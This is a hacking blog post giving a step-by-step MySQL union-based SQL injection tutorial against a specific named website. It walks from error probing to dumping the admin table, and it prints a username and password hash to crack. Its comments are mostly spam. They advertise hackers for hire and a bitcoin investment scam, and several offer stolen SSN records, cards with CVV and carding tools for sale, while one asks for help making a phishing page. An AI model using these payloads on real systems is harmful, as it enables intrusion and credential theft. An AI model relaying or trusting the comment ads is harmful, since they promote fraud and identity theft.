Learn How Hackers Hack Websites MYSQL Injection Tutorial


    - SQL Injection -
This Article Is About how to Hack a website with SQL Injection.I and stealthhackroom.blogspot.com Takes No responsibility for it,s misuse.ok.

we have a target http://www.allaboutcar.net/articles.php?topic=-3 let see if this is vnlnerable to sql Injection to check it put a ' in the end 
http://www.allaboutcar.net/articles.php?topic=3'\
it gives a mysql Database error . that means its vnlnerable to sql injection .. ok lets get the cloumn numbers to do that u need this command "order by " .. put that in the end with count numbers
For Example:[-
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--

do that untill u get a error

It gives a error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--

that mean it only has 5 columns ..  because it didn,t give a error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
ok lets do the Union
to do this .. u need to use this command Union select 

http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--

like that ..

there sould be number pop up somewhere

we got number 2 pop'd .. ok lets do the inject to 2
1st thing we need to check the db version if its 5 ..we continue .. if itsversion 4 .. u have to guess the table and columns to check the database version use this command "@@version" or "version()"its the version 5

5.0.67

ok now .. 

let get the table names.. to do that u need to use this commands

group_concat(table_name)
information_schema.tables
we put this because we need the tables of the default detabase
where table_schema=database()--

we have the list of table here now

ok .. now we got this tables

http://www.allaboutcar.net/articles.php?topic=-3 
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

Admins

,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,
forum_c,gbook,

infopages,

jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,
users,ok we have the admin table here ..ok lets get the columns now .. to do that just chnage this
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

to
http://www.allaboutcar.net/articles.php?topic=-3 
union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

Now we have the columns 

id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,
topic,author,id,ip,

date,id,title,

alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,
what,date,wid,name,

mail,title,

text,ip,

id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,

now lets put this togeter !!

Table : admins
Columns : id,nick,pass,

In this we asked for the columns name's data from admin table
http://www.allaboutcar.net/articles.php?topic=-3

union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
now here we have the id , nick and password hash .. you need to use a md5 cracker to crack this password .
This Tutorial Is Only For Educational Purposes.
So Friends that all for this tutorial
Username : MaTySeK, 

Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253

15 comments:

Unknown said...

where to put username and password ??

Unknown said...

Is there any way to lock the USB port so that no one can transfer data in absence.

Regards..

Unknown said...

i don't get the command union select

what do you mean by there should be number pop up somewhere

should i have to put the number 1,2,3,4,5-- in a series or i have to put the number 1 by 1 to check
it

by putting 1 by 1 i get an error on whole numbers 1,2,3,4,5

by putting the number in a series how should know the pop up number????

plese tell me

KARTHIKEYAN said...

Please tell how to Inject in Stored Procedure..
I heard that it is very hard to inject. Is it So

Love said...

k i ill try

Unknown said...

The used SELECT statements have a different number of columns

Unknown said...

when execute this script above mention error showing

select * from xyz where id=1 union select 1 ,group_concat(table_name),1 from information_schema.tables where table_schema=database()--

Unknown said...

I want to make a phishing page can you help me out with this contact me at jimmyjason63@gmail.com

siqing chen said...

Everyday is another opportunity to set up a good plan, you might have been facing financial difficulties and you want to put an end to it. But putting an end to it is not just saying, is not just working hard is all about working smart, you don't wait for tomorrow you get prepared for it....
To start an INVESTMENT in BITCOIN. feel free to contact.. mail: skylinktechnes@yahoo.com  or  whatsapp: +1(213)785-1553  or website: https://skylinktechnes.wixsite.com/info  or telegram group: https://t.me/hacksandinvestmenttutorials

jane holly said...

This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

-Phone hacks (remotely)
-Credit repair
-Bitcoin recovery (any cryptocurrency)
-Make money from home (USA only)
-Social media hacks
-Website hacks
-Erase criminal records (USA & Canada only)
-Grade change

Email: onlineghosthacker247@ gmail .com

No Name said...

CONTACT 24/7
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com

Selling SSN+Dob Leads/Fullz with Driving License/ID Number For Tax return & W-2 Form filling, etc.

>>1$ each without DL/ID number
>>2$ each with DL
>>5$ each for premium (also included relative info)

Price reduce in Bulk order

DETAILS IN LEADs/FULLZ/PROS

->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER WITH EXPIRY DATE
->COMPLETE ADDRESS
->PHONE NUMBER, EMAIL, I.P ADDRESS
->EMPLOYMENT DETAILS
->REALTIONSHIP DETAILS
->MORTGAGE INFO
->BANK ACCOUNT DETAILS

>All Leads are Spammed & Verified.
>Fresh spammed data of USA Credit Bureau
>Good credit Scores, 700 minimum scores
>Invalid info found, will be replaced.
>Payment mode BTC, ETH, LTC, PayPal, USDT & PERFECT MONEY

''OTHER GADGETS PROVIDING''

>SSN+DOB Fullz
>CC with CVV
>Photo ID's
>Dead Fullz
>Carding Tutorials
>Hacking Tutorials
>SMTP Linux Root
>DUMPS with pins track 1 and 2
>Sock Tools
>Server I.P's
>HQ Emails with passwords

Contact 24/7

Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040

Amalia Eva said...

I Want to use this medium in appreciating hacking setting, after being ripped off my money,he helped me find my cheating lover whom i trusted alot and he helped me hack his WHATSAPP, GMAIL and kik and all other platforms and i got to know that he has being cheating on me, in less than 24 hours he helped me out with everything, hacking setting is trust worthy and affordable contact him on: hackingsetting50 at gmail dot com

No Name said...

Hi Guy's

Fresh & valid spammed USA SSN+Dob Leads with DL available in bulk.

>>1$ each SSN+DOB
>>2$ each with SSN+DOB+DL
>>5$ each for premium (also included relative info)

Prices are negotiable in bulk order
Serious buyer contact me no time wasters please
Bulk order will be preferable

CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com

OTHER STUFF YOU CAN GET

SSN+DOB Fullz
CC's with CVV's (vbv & non-vbv)
USA Photo ID'S (Front & back)

All type of tutorials available
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

SMTP Linux Root
DUMPS with pins track 1 and 2
Socks, rdp's, vpn's
Server I.P's
HQ Emails with passwords

Looking for long term business
For trust full vendor, feel free to contact

CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com

Sophia Mia said...

Are you willing to know who your spouse really is, if your spouse is cheating just contact hackingsetting, He is good at hacking into cell phones,changing school grades and many more. This great hacker has also worked for me and my colleagues and we got results of our spouses whatsapp messages,call logs, text messages, viber, kik, Facebook, emails, deleted text messages and many more, this hacker is very fast, cheap and affordable. He has never disappointed me and my colleagues for once, contact him if you have any form of hacking problem, am very sure he will help you out. THANK YOU.

contact: hackingsetting50@gmail.com

ICQ 752822040 said...

"SSN LEADS/FULLZ AVAILABLE"
"TOOLS & TUTORIALS AVAILABLE"

***Contact Details***
=>Telegram > @leadsupplier
=>ICQ > 752822040
=>Skype > Peeterhacks
=>Wicker me > peeterhacks

**************************************
>>SSN DOB DL FULLZ with complete info
>>CC With CVV (vbv & non vbv)
>>FULLZ FOR SBA, PUA & TAX RETURN FILLING
>>I.D Photos Front & Back
>>High Credit fullz
>>Premium Fullz

***************************************
All Types of Tools & Tutorials Available

"SPAMMING" "ETHICAL HACKING" "CARDING" "CASHING"
"KALI LINUX" "SCRIPTING"

"OTHER STUFF"
=>BTC Flasher/Cracker
=>SQL Injector
=>Logins
=>SMTP Linux Root
=>DUMPS with pins track 1 and 2 with & without pin
=>SMS Sender & Email Blaster
=>Server I.P's & Proxies
=>HQ Email Combo

=>Telegram > @leadsupplier
=>ICQ > 752822040
=>Skype > Peeterhacks
=>Wicker me > peeterhacks

*Serious buyers will always welcome
*Price will be reduce in bulk order
*Hope we do a great business together

Post a Comment

STEALTH HACKER

Sponsers